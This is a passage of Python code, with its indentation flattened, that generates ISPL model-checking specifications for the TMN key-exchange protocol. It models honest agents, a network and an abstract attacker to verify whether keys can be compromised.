protocol += "Wait};\n"
protocol += "\t\t(message3=plain and Environment.protocol=true): {sendMessage3ToAlice};\n"
protocol += "\t\tOther: {Wait};\n"
protocol += "\tend Protocol\n"
return protocol
def __create_server_evolution(self):
evolution = "\tEvolution:\n"
for agent_name in self.agents:
evolution += f"\t\t{agent_name}Key=true if\n"
for message_no in range(1, self.no_messages + 1):
evolution += f"\t\t\t(Action=decryptMessage{message_no} and Environment.message{message_no}Content={agent_name}KeyM) or\n"
evolution = evolution.rstrip("\nro ")
evolution += ";\n"
for message_no in range(1, self.no_messages + 1):
evolution += f"\t\tmessage{message_no}=plain if Action=decryptMessage{message_no};\n"
for message_no in range(1, self.no_messages + 1):
evolution += f"\t\tmessage{message_no}=encrypted if\n"
evolution += f"\t\t\tmessage{message_no}=none and (\n"
for agent_name in self.agents:
if agent_name == "server":
continue
agent_name = StringTools.capitalize_first_letter(agent_name)
evolution += f"\t\t\t{agent_name}.Action=sendMessage{message_no}ToServer or\n"
evolution = evolution.rstrip("\nro")
evolution += ");\n"
for message_no in range(1, self.no_messages + 1):
evolution += f"\t\tmessage{message_no}=plain if\n"
for agent_name in self.agents:
for key_name in self.agents:
evolution += f"\t\t\t({agent_name}Key=true and Environment.message{message_no}Content={agent_name}KeyM and {key_name}Key=true and Environment.message{message_no}Key={key_name}KeyM) or\n"
evolution = evolution.rstrip("\nro ")
evolution += ";\n"
evolution += "\tend Evolution\n"
return evolution
def __create_attacker(self):
agent = "Agent Attacker\n"
agent += self.__create_attacker_vars()
agent += self.__create_attacker_actions()
agent += self.__create_attacker_protocol()
agent += self.__create_attacker_evolution()
agent += "end Agent\n\n"
return agent
def __create_attacker_lobsvars(self):
lobsvars = "\tLobsvars = {"
lobsvars += "};\n"
return lobsvars
def __create_attacker_vars(self):
vars = "\tVars:\n"
for agent_name in self.agents:
vars += f"\t\t{agent_name}Key : boolean;\n"
for message_no in range(1, self.no_messages + 1):
vars += f"\t\tmessage{message_no} : " + "{none, plain, encrypted};\n"
vars += "\tend Vars\n"
return vars
def __create_attacker_actions(self):
actions = "\tActions = {"
for message_no in range(1, self.no_messages + 1):
actions += f"decryptMessage{message_no}, "
for agent_name in self.agents:
if agent_name == 'attacker':
continue
agent_name = StringTools.capitalize_first_letter(agent_name)
actions += f"sendMessage{message_no}To{agent_name}, "
actions += "Wait};\n"
return actions
def __create_attacker_protocol(self):
protocol = "\tProtocol:\n"
for message_no in range(1, self.no_messages + 1):
for agent_name in self.agents:
protocol += f"\t\t(message{message_no}=encrypted and {agent_name}Key=true and Environment.message{message_no}Key={agent_name}KeyM) or\n"
protocol = protocol.rstrip("\nro ")
protocol += ": {" + f"decryptMessage{message_no}" + "};\n"
protocol += "\t\tOther: {Wait};\n"
protocol += "\tend Protocol\n"
return protocol
def __create_attacker_evolution(self):
evolution = "\tEvolution:\n"
for agent_name in self.agents:
evolution += f"\t\t{agent_name}Key=true if\n"
for message_no in range(1, self.no_messages + 1):
evolution += f"\t\t\t(Action=decryptMessage{message_no} and Environment.message{message_no}Content={agent_name}KeyM) or\n"
evolution = evolution.rstrip("\nro ")
evolution += ";\n"
for message_no in range(1, self.no_messages + 1):
evolution += f"\t\tmessage{message_no}=encrypted if\n"
evolution += f"\t\t\tmessage{message_no}=none and\n"
evolution += "\t\t\t(\n"
for agent_name in self.agents:
agent_name = StringTools.capitalize_first_letter(agent_name)
for second_agent in self.agents:
second_agent = StringTools.capitalize_first_letter(second_agent)
if agent_name == second_agent:
continue
evolution += f"\t\t\t{agent_name}.Action=sendMessage{message_no}To{second_agent} or\n"
evolution = evolution.rstrip("\nro")
evolution += ");\n"
evolution += "\tend Evolution\n"
return evolution
def __create_evaluation(self):
evaluation = "Evaluation\n"
evaluation += "\tkeyExchanged if Alice.bobKey=true;\n"
evaluation += "\tcompromised if Attacker.aliceKey=true or Attacker.bobKey=true or Attacker.serverKey=true;\n"
evaluation += "end Evaluation\n\n"
return evaluation
def __create_init_states(self):
init_states = "InitStates\n"
keys = ["server", "server", "alice"]
init_states += "\tEnvironment.protocol=false and\n"
for message_no in range(1, self.no_messages + 1):
init_states += f"\tEnvironment.message{message_no}Key={keys[message_no - 1]}KeyM and\n"
keys = ["alice", "bob", "bob"]
for message_no in range(1, self.no_messages + 1):
init_states += f"\tEnvironment.message{message_no}Content={keys[message_no - 1]}KeyM and\n"
for agent_name in self.agents:
agent_name = StringTools.capitalize_first_letter(agent_name)
for message_no in range(1, self.no_messages + 1):
msg = "none"
if agent_name == "Alice" and message_no == 1:
msg = "plain"
elif agent_name == "Bob" and message_no == 2:
msg = "plain"
init_states += f"\t{agent_name}.message{message_no}={msg} and\n"
for agent_name in self.agents:
for key_name in self.agents:
know_key = "false"
if agent_name == key_name:
know_key = "true"
init_states += f"\t{StringTools.capitalize_first_letter(agent_name)}.{key_name}Key={know_key} and\n"
init_states = init_states.rstrip("\ndna ")
init_states += ";\nend InitStates\n\n"
return init_states
def __create_groups(self):
groups = "Groups\n"
groups += "\ttrusted={Alice, Bob, Server};\n"
groups += "\tatk={Attacker};\n"
groups += "end Groups\n\n"
return groups
def __create_formulae(self):
formulae = "Formulae\n"
formulae += "\t<trusted>F keyExchanged;\n"
formulae += "\t<trusted>G !compromised;\n"
formulae += "end Formulae\n\n"
return formulae
class TmnProtocolIsplGeneratorV2:
ispl_model = ""
agents = ["alice", "bob", "server", "attacker"]
keys = ["aliceKey", "bobKey", "serverPublicKey", "serverPrivateKey", "attackerKey"]
no_messages = 3
follow_protocol = True
def __init__(self):
return
def create_ispl_model(self):
self.ispl_model += self.__define_semantics()
self.ispl_model += self.__create_environment()
for agent_name in self.agents:
if agent_name == "attacker":
continue
self.ispl_model += self.__create_agent(agent_name)
self.ispl_model += self.__create_attacker()
self.ispl_model += self.__create_network()
self.ispl_model += self.__create_evaluation()
self.ispl_model += self.__create_init_states()
self.ispl_model += self.__create_groups()
self.ispl_model += self.__create_formulae()
return self.ispl_model
def __define_semantics(self):
semantics = "Semantics=SingleAssignment;\n\n"
return semantics
def __create_environment(self):
environment = "Agent Environment\n"
environment += self.__create_environment_obsvars()
environment += self.__create_environment_vars()
environment += self.__create_environment_actions()
environment += self.__create_environment_protocol()
environment += self.__create_environment_evolution()
environment += "end Agent\n\n"
return environment
def __create_environment_obsvars(self):
obsvars = "\tObsvars:\n"
obsvars += "\t\tprocessingMessage : boolean;\n"
obsvars += "\t\tprotocol : boolean;\n"
obsvars += "\tend Obsvars\n"
return obsvars
def __create_environment_vars(self):
vars = "\tVars:\n"
vars += "\tend Vars\n"
return vars
def __create_environment_actions(self):
actions = "\tActions = {none};\n"
return actions
def __create_environment_protocol(self):
protocol = "\tProtocol:\n\t\tOther: {none};\n\tend Protocol\n"
return protocol
def __create_environment_evolution(self):
evolution = "\tEvolution:\n"
evolution += "\t\tprocessingMessage=true if\n"
if not self.follow_protocol:
for message_content in self.keys:
message_content = StringTools.capitalize_first_letter(message_content)
for message_source in self.agents:
message_source = StringTools.capitalize_first_letter(message_source)
for message_destination in self.agents:
message_destination = StringTools.capitalize_first_letter(message_destination)
if message_source == message_destination:
continue
for message_encryption in self.keys:
message_encryption = StringTools.capitalize_first_letter(message_encryption)
evolution += f"\t\t\t{message_source}.Action=Send{message_content}To{message_destination}EncryptedWith{message_encryption} or \n"
else:
evolution += "\t\t\tAlice.Action=SendAliceKeyToServerEncryptedWithServerPublicKey or\n"
evolution += "\t\t\tBob.Action=SendBobKeyToServerEncryptedWithServerPublicKey or\n"
evolution += "\t\t\tServer.Action=SendBobKeyToAliceEncryptedWithAliceKey or\n"
for message_content in self.keys:
message_content = StringTools.capitalize_first_letter(message_content)
message_source = "Attacker"
for message_destination in self.agents:
message_destination = StringTools.capitalize_first_letter(message_destination)
if message_source == message_destination:
continue
for message_encryption in self.keys:
message_encryption = StringTools.capitalize_first_letter(message_encryption)
evolution += f"\t\t\t{message_source}.Action=Send{message_content}To{message_destination}EncryptedWith{message_encryption} or \n"
evolution = evolution.rstrip("\nro ")
evolution += ";\n"
evolution += "\t\tprocessingMessage=false if\n"
for message_content in self.keys:
message_content = StringTools.capitalize_first_letter(message_content)
for message_destination in self.agents:
message_destination = StringTools.capitalize_first_letter(message_destination)
for message_encryption in self.keys:
message_encryption = StringTools.capitalize_first_letter(message_encryption)
evolution += f"\t\t\tNetwork.Action=Forward{message_content}To{message_destination}EncryptedWith{message_encryption} or \n"
evolution = evolution.rstrip("\nro ")
evolution += ";\n"
evolution += "\tend Evolution\n"
return evolution
def __create_attacker(self):
agent = "Agent Attacker\n"
agent += self.__create_attacker_vars()
agent += self.__create_attacker_actions()
agent += self.__create_attacker_protocol()
agent += self.__create_attacker_evolution()
agent += "end Agent\n\n"
return agent
def __create_attacker_lobsvars(self):
lobsvars = "\tLobsvars = {"
lobsvars += "};\n"
return lobsvars
def __create_attacker_vars(self):
vars = "\tVars:\n"
for key_name in self.keys:
vars += f"\t\t{key_name}K : " + "{none, plain, encrypted};\n"
for key_name in self.keys:
vars += f"\t\t{key_name}EncryptionKey : " + "{"
for key_name2 in self.keys:
vars += f"{key_name2}, "
vars += "none};\n"
vars += "\tend Vars\n"
return vars
def __create_attacker_actions(self):
actions = "\tActions = {"
for key_name in self.keys:
key_name = StringTools.capitalize_first_letter(key_name)
actions += f"Decrypt{key_name}, "
for agent_name in self.agents:
agent_name = StringTools.capitalize_first_letter(agent_name)
if agent_name == "Attacker":
continue
for encryption_key in self.keys:
encryption_key = StringTools.capitalize_first_letter(encryption_key)
actions += f"Send{key_name}To{agent_name}EncryptedWith{encryption_key}, "
for agent_name in self.agents:
agent_name = StringTools.capitalize_first_letter(agent_name)
actions += f"RedirectTo{agent_name}, "
for content_key in self.keys:
content_key = StringTools.capitalize_first_letter(content_key)
for encryption_key in self.keys:
encryption_key = StringTools.capitalize_first_letter(encryption_key)
actions += f"ChangeContentTo{content_key}EncryptedWith{encryption_key}, "
actions += "ForwardMessage, "
actions += "Wait};\n"
return actions
def __create_attacker_protocol(self):
protocol = "\tProtocol:\n"
protocol += self.__create_protocol_decryption()
protocol += self.__create_protocol_communication("attacker")
protocol += "\t\tEnvironment.processingMessage=true : {"
for agent_name in self.agents:
agent_name = StringTools.capitalize_first_letter(agent_name)
protocol += f"RedirectTo{agent_name}, "
protocol += "ForwardMessage, Wait};\n"
for content_key in self.keys:
for encryption_key in self.keys:
protocol += f"\t\t{content_key}K=plain and {encryption_key}K=plain and Environment.processingMessage=true: " + "{"
protocol += f"ChangeContentTo{StringTools.capitalize_first_letter(content_key)}EncryptedWith{StringTools.capitalize_first_letter(encryption_key)}, "
protocol += "Wait};\n"
protocol += "\t\tOther: {Wait};\n"
protocol += "\tend Protocol\n"
return protocol
def __create_attacker_evolution(self):
evolution = "\tEvolution:\n"
evolution += self.__create_evolution_key_decryption()
evolution += self.__create_evolution_message_receiving("Attacker")
evolution += "\tend Evolution\n"
return evolution
def __create_agent(self, agent_name):
agent_name = StringTools.capitalize_first_letter(agent_name)
agent = f"Agent {agent_name}\n"
agent += self.__create_agent_vars()
agent += self.__create_agent_actions(agent_name)
agent += self.__create_agent_protocol(agent_name)
agent += self.__create_agent_evolution(agent_name)
agent += "end Agent\n\n"
return agent
def __create_agent_vars(self):
vars = "\tVars:\n"
for key_name in self.keys:
vars += f"\t\t{key_name}K : " + "{none, plain, encrypted};\n"
for key_name in self.keys:
vars += f"\t\t{key_name}EncryptionKey : " + "{"
for key_name2 in self.keys:
vars += f"{key_name2}, "
vars += "none};\n"
vars += "\tend Vars\n"
return vars
def __create_agent_actions(self, current_agent_name):
actions = "\tActions = {"
current_agent_name = StringTools.capitalize_first_letter(current_agent_name)
for key_name in self.keys:
key_name = StringTools.capitalize_first_letter(key_name)
actions += f"Decrypt{key_name}, "
if not self.follow_protocol:
for agent_name in self.agents:
agent_name = StringTools.capitalize_first_letter(agent_name)
if agent_name == current_agent_name:
continue
for encryption_key in self.keys:
encryption_key = StringTools.capitalize_first_letter(encryption_key)
actions += f"Send{key_name}To{agent_name}EncryptedWith{encryption_key}, "
if self.follow_protocol:
if current_agent_name == "Alice":
actions += "SendAliceKeyToServerEncryptedWithServerPublicKey, "
elif current_agent_name == "Bob":
actions += "SendBobKeyToServerEncryptedWithServerPublicKey, "
elif current_agent_name == "Server":
actions += "SendBobKeyToAliceEncryptedWithAliceKey, "
actions += "Wait};\n"
return actions
def __create_agent_protocol(self, current_agent_name):
protocol = "\tProtocol:\n"
protocol += self.__create_protocol_decryption()
if not self.follow_protocol:
protocol += self.__create_protocol_communication(current_agent_name)
else:
if current_agent_name == "Alice":
protocol += "\t\tEnvironment.protocol=true and Environment.processingMessage=false: {SendAliceKeyToServerEncryptedWithServerPublicKey, Wait};\n"
elif current_agent_name == "Bob":
protocol += "\t\tEnvironment.protocol=true and Environment.processingMessage=false: {SendBobKeyToServerEncryptedWithServerPublicKey, Wait};\n"
elif current_agent_name == "Server":
protocol += "\t\tEnvironment.protocol=true and aliceKeyK=plain and bobKeyK=plain and Environment.processingMessage=false: {SendBobKeyToAliceEncryptedWithAliceKey, Wait};\n"
protocol += "\t\tOther: {Wait};\n"
protocol += "\tend Protocol\n"
return protocol
def __create_protocol_decryption(self):
protocol = ""
for key_name in self.keys:
protocol += f"\t\t{key_name}K=encrypted and (\n"
for key_name2 in self.keys:
if key_name2.find("Public") != -1:
key_name3 = key_name2.replace("Public", "Private")
protocol += f"\t\t\t({key_name}EncryptionKey={key_name2} and {key_name3}K=plain) or\n"
elif key_name2.find("Private") != -1:
key_name3 = key_name2.replace("Private", "Public")
protocol += f"\t\t\t({key_name}EncryptionKey={key_name2} and {key_name3}K=plain) or\n"
else:
protocol += f"\t\t\t({key_name}EncryptionKey={key_name2} and {key_name2}K=plain) or\n"
protocol = protocol.rstrip("\nro ")
protocol += "): {" + f"Decrypt{StringTools.capitalize_first_letter(key_name)}" + "};\n"
return protocol
def __create_protocol_communication(self, current_agent_name):
protocol = ""
current_agent_name = StringTools.capitalize_first_letter(current_agent_name)
for content_key in self.keys:
for encryption_key in self.keys:
protocol += f"\t\t{content_key}K=plain and {encryption_key}K=plain and Environment.processingMessage=false and Environment.protocol=false: " + "{"
for agent_name in self.agents:
agent_name = StringTools.capitalize_first_letter(agent_name)
if agent_name == current_agent_name:
continue
protocol += f"Send{StringTools.capitalize_first_letter(content_key)}To{agent_name}EncryptedWith{StringTools.capitalize_first_letter(encryption_key)}, "
protocol += "Wait};\n"
return protocol
def __create_agent_evolution(self, current_agent_name):
evolution = "\tEvolution:\n"
evolution += self.__create_evolution_key_decryption()
evolution += self.__create_evolution_message_receiving(current_agent_name)
evolution += "\tend Evolution\n"
return evolution
def __create_evolution_key_decryption(self):
evolution = ""
for key_name in self.keys:
evolution += f"\t\t{key_name}K=plain if\n"
key_name = StringTools.capitalize_first_letter(key_name)
evolution += f"\t\t\tAction=Decrypt{key_name};\n"
return evolution
def __create_evolution_message_receiving(self, current_agent_name):
evolution = ""
current_agent_name = StringTools.capitalize_first_letter(current_agent_name)
for received_key in self.keys:
evolution += f"\t\t{received_key}K=encrypted if\n"
evolution += f"\t\t\t{received_key}K=none and (\n"
received_key = StringTools.capitalize_first_letter(received_key)
for encryption_key in self.keys:
encryption_key = StringTools.capitalize_first_letter(encryption_key)
evolution += f"\t\t\tNetwork.Action=Forward{received_key}To{current_agent_name}EncryptedWith{encryption_key} or\n"
evolution = evolution.rstrip("\nro ")
evolution += ");\n"
for received_key in self.keys:
for encryption_key in self.keys:
evolution += f"\t\t{received_key}EncryptionKey={encryption_key} if\n"
evolution += f"\t\t\t{received_key}EncryptionKey=none and\n"
encryption_key = StringTools.capitalize_first_letter(encryption_key)
evolution += f"\t\t\tNetwork.Action=Forward{StringTools.capitalize_first_letter(received_key)}To{current_agent_name}EncryptedWith{encryption_key};\n"
return evolution
def __create_network(self):
agent = "Agent Network\n"
agent += self.__create_network_vars()
agent += self.__create_network_actions()
agent += self.__create_network_protocol()
agent += self.__create_network_evolution()
agent += "end Agent\n\n"
return agent
def __create_network_lobsvars(self):
lobsvars = "\tLobsvars = {"
lobsvars += "};\n"
return lobsvars
def __create_network_vars(self):
vars = "\tVars:\n"
vars += "\t\tmessageContent : {"
for key_name in self.keys:
vars += f"{key_name}, "
vars += "none};\n"
vars += "\t\tmessageDestination: {"
for agent_name in self.agents:
vars += f"{agent_name}, "
vars += "none};\n"
vars += "\t\tmessageSource: {"
for agent_name in self.agents:
vars += f"{agent_name}, "
vars += "none};\n"
vars += "\t\tmessageEncryption : {"
for key_name in self.keys:
vars += f"{key_name}, "
vars += "none};\n"
vars += "\t\tattackerDone : boolean;\n"
vars += "\t\tforwardAllToAttacker : boolean;\n"
vars += "\t\tforwardedToAttacker : boolean;\n"
vars += "\t\twaitForAttacker : boolean;\n"
vars += "\tend Vars\n"
return vars
def __create_network_actions(self):
actions = "\tActions = {"
for key_name in self.keys:
key_name = StringTools.capitalize_first_letter(key_name)
for agent_name in self.agents:
agent_name = StringTools.capitalize_first_letter(agent_name)
for encryption_key in self.keys:
encryption_key = StringTools.capitalize_first_letter(encryption_key)
actions += f"Forward{key_name}To{agent_name}EncryptedWith{encryption_key}, "
actions += "Wait};\n"
return actions
def __create_network_protocol(self):
protocol = "\tProtocol:\n"
for message_content in self.keys:
for message_destination in self.agents:
for message_encryption in self.keys:
protocol += f"\t\t((attackerDone=true and waitForAttacker=true) or waitForAttacker=false) and ((forwardAllToAttacker=true and forwardedToAttacker=true) or forwardAllToAttacker=false) and messageContent={message_content} and messageDestination={message_destination} and messageEncryption={message_encryption}: " + "{"
protocol += f"Forward{StringTools.capitalize_first_letter(message_content)}To{StringTools.capitalize_first_letter(message_destination)}EncryptedWith{StringTools.capitalize_first_letter(message_encryption)}" + "};\n"
for message_content in self.keys:
for message_encryption in self.keys:
protocol += f"\t\tforwardAllToAttacker=true and forwardedToAttacker=false and messageContent={message_content} and messageEncryption={message_encryption}: " + "{"
protocol += f"Forward{StringTools.capitalize_first_letter(message_content)}ToAttackerEncryptedWith{StringTools.capitalize_first_letter(message_encryption)}" + "};\n"
protocol += "\t\tOther: {Wait};\n"
protocol += "\tend Protocol\n"
return protocol
def __create_network_evolution(self):
evolution = "\tEvolution:\n"
evolution += "\t\tattackerDone=true if Attacker.Action=ForwardMessage;\n"
evolution += self.__create_network_evolution_forward_to_attacker()
evolution += self.__create_network_evolution_clean_vars()
evolution += self.__create_network_evolution_redirect()
evolution += self.__create_network_evolution_change_content()
for message_content in self.keys:
evolution += f"\t\tmessageContent={message_content} if (\n"
message_content = StringTools.capitalize_first_letter(message_content)
if not self.follow_protocol:
for message_source in self.agents:
message_source = StringTools.capitalize_first_letter(message_source)
for message_destination in self.agents:
message_destination = StringTools.capitalize_first_letter(message_destination)
if message_source == message_destination:
continue
for message_encryption in self.keys:
message_encryption = StringTools.capitalize_first_letter(message_encryption)
evolution += f"\t\t\t{message_source}.Action=Send{message_content}To{message_destination}EncryptedWith{message_encryption} or \n"
else:
message_source = "Attacker"
for message_destination in self.agents:
message_destination = StringTools.capitalize_first_letter(message_destination)
if message_source == message_destination:
continue
for message_encryption in self.keys:
message_encryption = StringTools.capitalize_first_letter(message_encryption)
evolution += f"\t\t\t{message_source}.Action=Send{message_content}To{message_destination}EncryptedWith{message_encryption} or \n"
evolution = evolution.rstrip("\nro ")
evolution += ");\n"
if not self.follow_protocol:
for message_source in self.agents:
evolution += f"\t\tmessageSource={message_source} if (\n"
message_source = StringTools.capitalize_first_letter(message_source)
for message_content in self.keys:
message_content = StringTools.capitalize_first_letter(message_content)
for message_destination in self.agents:
message_destination = StringTools.capitalize_first_letter(message_destination)
if message_source == message_destination:
continue
for message_encryption in self.keys:
message_encryption = StringTools.capitalize_first_letter(message_encryption)
evolution += f"\t\t\t{message_source}.Action=Send{message_content}To{message_destination}EncryptedWith{message_encryption} or \n"
evolution = evolution.rstrip("\nro ")
evolution += ");\n"
else:
evolution += f"\t\tmessageSource=attacker if (\n"
message_source = "Attacker"
for message_content in self.keys:
message_content = StringTools.capitalize_first_letter(message_content)
for message_destination in self.agents:
message_destination = StringTools.capitalize_first_letter(message_destination)
if message_source == message_destination:
continue
for message_encryption in self.keys:
message_encryption = StringTools.capitalize_first_letter(message_encryption)
evolution += f"\t\t\t{message_source}.Action=Send{message_content}To{message_destination}EncryptedWith{message_encryption} or \n"
evolution = evolution.rstrip("\nro ")
evolution += ");\n"
for message_destination in self.agents:
if self.follow_protocol and message_destination == "attacker":
continue
evolution += f"\t\tmessageDestination={message_destination} if (\n"
message_destination = StringTools.capitalize_first_letter(message_destination)
if not self.follow_protocol:
for message_source in self.agents:
message_source = StringTools.capitalize_first_letter(message_source)
if message_source == message_destination:
continue
for message_content in self.keys:
message_content = StringTools.capitalize_first_letter(message_content)
for message_encryption in self.keys:
message_encryption = StringTools.capitalize_first_letter(message_encryption)
evolution += f"\t\t\t{message_source}.Action=Send{message_content}To{message_destination}EncryptedWith{message_encryption} or \n"
else:
message_source = "Attacker"
if message_source == message_destination:
continue
for message_content in self.keys:
message_content = StringTools.capitalize_first_letter(message_content)
for message_encryption in self.keys:
message_encryption = StringTools.capitalize_first_letter(message_encryption)
evolution += f"\t\t\t{message_source}.Action=Send{message_content}To{message_destination}EncryptedWith{message_encryption} or \n"
evolution = evolution.rstrip("\nro ")
evolution += ");\n"
for message_encryption in self.keys:
evolution += f"\t\tmessageEncryption={message_encryption} if (\n"
message_encryption = StringTools.capitalize_first_letter(message_encryption)
if not self.follow_protocol:
for message_source in self.agents:
message_source = StringTools.capitalize_first_letter(message_source)
for message_destination in self.agents:
message_destination = StringTools.capitalize_first_letter(message_destination)
if message_source == message_destination:
continue
for message_content in self.keys:
message_content = StringTools.capitalize_first_letter(message_content)
evolution += f"\t\t\t{message_source}.Action=Send{message_content}To{message_destination}EncryptedWith{message_encryption} or \n"
else:
message_source = "Attacker"
for message_destination in self.agents:
message_destination = StringTools.capitalize_first_letter(message_destination)
if message_source == message_destination:
continue
for message_content in self.keys:
message_content = StringTools.capitalize_first_letter(message_content)
evolution += f"\t\t\t{message_source}.Action=Send{message_content}To{message_destination}EncryptedWith{message_encryption} or \n"
evolution = evolution.rstrip("\nro ")
evolution += ");\n"
if self.follow_protocol:
evolution += "\t\tmessageContent=aliceKey if Alice.Action=SendAliceKeyToServerEncryptedWithServerPublicKey;\n"
evolution += "\t\tmessageContent=bobKey if Bob.Action=SendBobKeyToServerEncryptedWithServerPublicKey;\n"
evolution += "\t\tmessageContent=bobKey if Server.Action=SendBobKeyToAliceEncryptedWithAliceKey;\n"
evolution += "\t\tmessageSource=alice if Alice.Action=SendAliceKeyToServerEncryptedWithServerPublicKey;\n"
evolution += "\t\tmessageSource=bob if Bob.Action=SendBobKeyToServerEncryptedWithServerPublicKey;\n"
evolution += "\t\tmessageSource=server if Server.Action=SendBobKeyToAliceEncryptedWithAliceKey;\n"
evolution += "\t\tmessageDestination=server if Alice.Action=SendAliceKeyToServerEncryptedWithServerPublicKey;\n"
evolution += "\t\tmessageDestination=server if Bob.Action=SendBobKeyToServerEncryptedWithServerPublicKey;\n"
evolution += "\t\tmessageDestination=alice if Server.Action=SendBobKeyToAliceEncryptedWithAliceKey;\n"
evolution += "\t\tmessageEncryption=serverPublicKey if Alice.Action=SendAliceKeyToServerEncryptedWithServerPublicKey;\n"
evolution += "\t\tmessageEncryption=serverPublicKey if Bob.Action=SendBobKeyToServerEncryptedWithServerPublicKey;\n"
evolution += "\t\tmessageEncryption=aliceKey if Server.Action=SendBobKeyToAliceEncryptedWithAliceKey;\n"
evolution += "\tend Evolution\n"
return evolution
def __create_network_evolution_forward_to_attacker(self):
evolution = "\t\tforwardedToAttacker=true if\n"
evolution += "\t\t\tforwardAllToAttacker=true and (\n"
for key_name in self.keys:
key_name = StringTools.capitalize_first_letter(key_name)
for encryption_key in self.keys:
encryption_key = StringTools.capitalize_first_letter(encryption_key)
evolution += f"\t\t\tAction=Forward{key_name}ToAttackerEncryptedWith{encryption_key} or\n"
evolution = evolution.rstrip("\nro ")
evolution += ");\n"
return evolution
def __create_network_evolution_clean_vars(self):
evolution = ""
vars = [["messageContent", "none"], ["messageDestination", "none"], ["messageSource", "none"],
["messageEncryption", "none"], ["forwardedToAttacker", "false"], ["attackerDone", "false"]]
for var in vars:
evolution += f"\t\t{var[0]}={var[1]} if\n"
evolution += f"\t\t\t((forwardedToAttacker=true and forwardAllToAttacker=true) or forwardAllToAttacker=false) and (\n"
for key_name in self.keys:
key_name = StringTools.capitalize_first_letter(key_name)
for agent_name in self.agents:
agent_name = StringTools.capitalize_first_letter(agent_name)
for encryption_key in self.keys:
encryption_key = StringTools.capitalize_first_letter(encryption_key)
evolution += f"\t\t\tAction=Forward{key_name}To{agent_name}EncryptedWith{encryption_key} or\n"
evolution = evolution.rstrip("\nro ")
evolution += ");\n"
return evolution
def __create_network_evolution_redirect(self):
evolution = ""
for agent_name in self.agents:
evolution += f"\t\tmessageDestination={agent_name} if\n"
evolution += "\t\t\tEnvironment.processingMessage=true and\n"
agent_name = StringTools.capitalize_first_letter(agent_name)
evolution += f"\t\t\tAttacker.Action=RedirectTo{agent_name};\n"
return evolution
def __create_network_evolution_change_content(self):
evolution = ""
for content_key in self.keys:
evolution += f"\t\tmessageContent={content_key} if\n"
evolution += "\t\t\tEnvironment.processingMessage=true and (\n"
content_key = StringTools.capitalize_first_letter(content_key)
for encryption_key in self.keys:
encryption_key = StringTools.capitalize_first_letter(encryption_key)
evolution += f"\t\t\tAttacker.Action=ChangeContentTo{content_key}EncryptedWith{encryption_key} or\n"
evolution = evolution.rstrip("\nro ")
evolution += ");\n"
for encryption_key in self.keys:
evolution += f"\t\tmessageEncryption={encryption_key} if\n"
evolution += "\t\t\tEnvironment.processingMessage=true and (\n"
encryption_key = StringTools.capitalize_first_letter(encryption_key)
for content_key in self.keys:
content_key = StringTools.capitalize_first_letter(content_key)
evolution += f"\t\t\tAttacker.Action=ChangeContentTo{content_key}EncryptedWith{encryption_key} or\n"
evolution = evolution.rstrip("\nro ")
evolution += ");\n"
return evolution
def __create_evaluation(self):
evaluation = "Evaluation\n"
evaluation += "\tkeyExchanged if Alice.bobKeyK=plain;\n"
evaluation += "\tcompromised if Attacker.aliceKeyK=plain or Attacker.bobKeyK=plain or Attacker.serverPrivateKeyK=plain;\n"
evaluation += "end Evaluation\n\n"
return evaluation
def __create_init_states(self):
init_states = "InitStates\n"
init_states += "\tEnvironment.processingMessage=false and\n"
for agent_name in self.agents:
for key_name in self.keys:
if key_name.find(agent_name) != -1 or key_name.find("PublicKey") != -1:
init_states += f"\t{StringTools.capitalize_first_letter(agent_name)}.{key_name}K=plain and\n"
else:
init_states += f"\t{StringTools.capitalize_first_letter(agent_name)}.{key_name}K=none and\n"
init_states += f"\t{StringTools.capitalize_first_letter(agent_name)}.{key_name}EncryptionKey=none and\n"
vars = ["messageContent", "messageDestination", "messageSource", "messageEncryption"]
for var in vars:
init_states += f"\tNetwork.{var}=none and\n"
init_states += "\tNetwork.attackerDone=false and\n"
init_states += "\tNetwork.forwardAllToAttacker=true and\n"
init_states += "\tNetwork.waitForAttacker=true and\n"
init_states += "\tNetwork.forwardedToAttacker=false;\n"
init_states += "end InitStates\n\n"
return init_states
def __create_groups(self):
groups = "Groups\n"
groups += "\ttrusted={Alice, Bob, Server};\n"
groups += "\tatk={Attacker, Network};\n"
groups += "end Groups\n\n"
return groups
def __create_formulae(self):
formulae = "Formulae\n"
formulae += "\t<trusted>F keyExchanged;\n"
formulae += "\t<trusted>G !compromised;\n"
formulae += "end Formulae\n\n"
return formulae
class CompTmnProtocolIsplGenerator:
ispl_model = ""
agents = ["alice", "bob", "server", "attacker"]
no_messages = 3
no_keys = 3
min_val = 1
max_val = 100
def __init__(self):
return
def create_ispl_model(self):
self.ispl_model += self.__define_semantics()
self.ispl_model += self.__create_environment()
self.ispl_model += self.__create_alice()
self.ispl_model += self.__create_bob()
self.ispl_model += self.__create_server()
self.ispl_model += self.__create_attacker()
self.ispl_model += self.__create_evaluation()
self.ispl_model += self.__create_init_states()
self.ispl_model += self.__create_groups()
self.ispl_model += self.__create_formulae()
return self.ispl_model
def __define_semantics(self):
semantics = "Semantics=SingleAssignment;\n\n"
return semantics
def __create_environment(self):
environment = "Agent Environment\n"
environment += self.__create_environment_obsvars()
environment += self.__create_environment_vars()
environment += self.__create_environment_actions()
environment += self.__create_environment_protocol()
environment += self.__create_environment_evolution()
environment += "end Agent\n\n"
return environment
def __create_environment_obsvars(self):
obsvars = "\tObsvars:\n"
obsvars += "\tend Obsvars\n"
return obsvars
def __create_environment_vars(self):
vars = "\tVars:\n"
vars += "\tend Vars\n"
return vars
def __create_environment_actions(self):
actions = "\tActions = {none};\n"
return actions
def __create_environment_protocol(self):
protocol = "\tProtocol:\n\t\tOther:{none};\n\tend Protocol\n"
return protocol
def __create_environment_evolution(self):
evolution = "\tEvolution:\n"
evolution += "\tend Evolution\n"
return evolution
def __create_alice(self):
agent = "Agent Alice\n"
agent += self.__create_alice_vars()
agent += self.__create_alice_actions()
agent += self.__create_alice_protocol()
agent += self.__create_alice_evolution()
agent += "end Agent\n\n"
return agent
def __create_alice_lobsvars(self):
lobsvars = "\tLobsvars = {"
lobsvars += "};\n"
return lobsvars
def __create_alice_vars(self):
vars = "\tVars:\n"
for message_no in range(1, self.no_messages + 1):
vars += f"\t\tmessage{message_no} : {self.min_val} .. {self.max_val};\n"
for key_no in range(1, self.no_keys + 1):
vars += f"\t\tkey{key_no} : {self.min_val} .. {self.max_val};\n"
vars += "\tend Vars\n"
return vars
def __create_alice_actions(self):
actions = "\tActions = {"
actions += "Wait};\n"
return actions
def __create_alice_protocol(self):
protocol = "\tProtocol:\n"
